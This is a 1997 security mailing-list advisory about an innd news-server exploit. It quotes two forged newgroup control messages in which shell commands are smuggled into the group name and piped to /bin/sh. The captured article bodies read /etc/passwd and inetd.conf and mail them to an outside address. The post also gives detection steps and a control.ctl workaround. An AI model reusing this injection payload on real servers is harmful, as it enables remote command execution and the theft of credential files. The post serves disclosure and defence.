[84] in Best-of-Security
BoS: RE: Innd Exploited.
daemon@ATHENA.MIT.EDU (Joseph J. Snyder III)
Mon Mar 17 18:39:28 1997
From: "Joseph J. Snyder III" <jsnyder@plasma.ea.wsoc.com>
Date: Mon, 17 Mar 97 13:58:06 EST
Reply-To: best-of-security@suburbia.net
Errors-To: best-of-security-request@suburbia.net
To: best-of-security@suburbia.net
Resent-From: best-of-security@suburbia.net
----------------------------------------------------------------------
PROBLEM:
This is reguarding the innd exploit that took place March
15, 1997 at approx. 1630-1645. This exploit seems to be wide
spread. The following is an example of the exploit:
-- begin example --
Unparseable newgroup by tale@uunet.uu.net
Path: nntp.xxxxxxxxx.xxx!nntp.netrex.net!gatech!EU.net!Norway.EU.net!sn.no!online.no!news.omgroup.com!online.no!bounce-back
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderatedControl: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Approved: newgroups-request@uunet.uu.net
Message-ID: <830201540.9220@uunet.uu.net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 4
#+
(/bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /bi>#-
Unsafe newgroup by tale@uunet.uu.net
Path: nntp.xxxxxxxxx.xxx!nntp.netrex.net!sbcntrex!news.eecs.umich.edu!news.radio.cz!newsbastard.radio.cz!news.radio.cz!CESspool!news.maxwell.syr.edu!nntp.uio.no!Norway.EU.net!online.no!news.omgroup.com!online.no!bounce-back
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Approved: newgroups-request@uunet.uu.net
Message-ID: <830201540.9223@uunet.uu.net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 4
#+
(/bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /usr/ucb/Mail -s kalle root@[193.12.106.1]
#-
-- end example --
If this newgroup is created then any message that is posted to the group will
be executed with /bin/sh.
----------------------------------------------------------------------
THINGS TO DO:
You should see what processes the uid that is running innd (hopefully not root)
and inspect programs that it is running through /bin/sh. Telnet connections
were also made in this exploit from the attacked machine to the attacker.
Run netstat to see if this is true in your case. Check your mqueue directory
for messages that contain mail to root@193.12.106.100 or that contain your
passwd file. Follow Cert procedures of what to do if you are hacked.
Finally reboot your machine to kill misc. /bin/sh scripts that may be running.
----------------------------------------------------------------------
IMPACT:
Any command that the user running news can run can be executed. With a little
creative scripting, known exploits can be created on the news server to gain
access to root and execute commands as root.
----------------------------------------------------------------------
RESOLUTION:
Unfortunately I have heard that Innd 1.5.1 does not fix this problem.
Currently I have not verified this claim.
----------------------------------------------------------------------
TEMPORARY WORKAROUND:
The temporary workaround could be to dissallow remote control of newsgroups.
This can be done by commenting out rmgroup and mkgroup configs that allow
offsite control of newsgroups. This can be done within the control.ctl file.
I am not an expert on innd so if anyone else knows of anything else that needs
to be done or if anything I am saying is incorrect please feel free to
add to this discussion.
----------------------------------------------------------------------
ADDITIONAL COMMENTS:
Please feel free to comment/add to this message.
----------------------------------------------------------------------
DISCLAIMER:
I am not responsible for anything that may happen because
of actions you take based on this message. Understand that I do not claim
to be an expert with innd and that any actions you take are at your own risk.
Joseph J. Snyder III
Network Security Eng.
Litton-PRC, Inc.
http://c3i.wsoc.com/
jsnyder@plasma.ea.wsoc.com
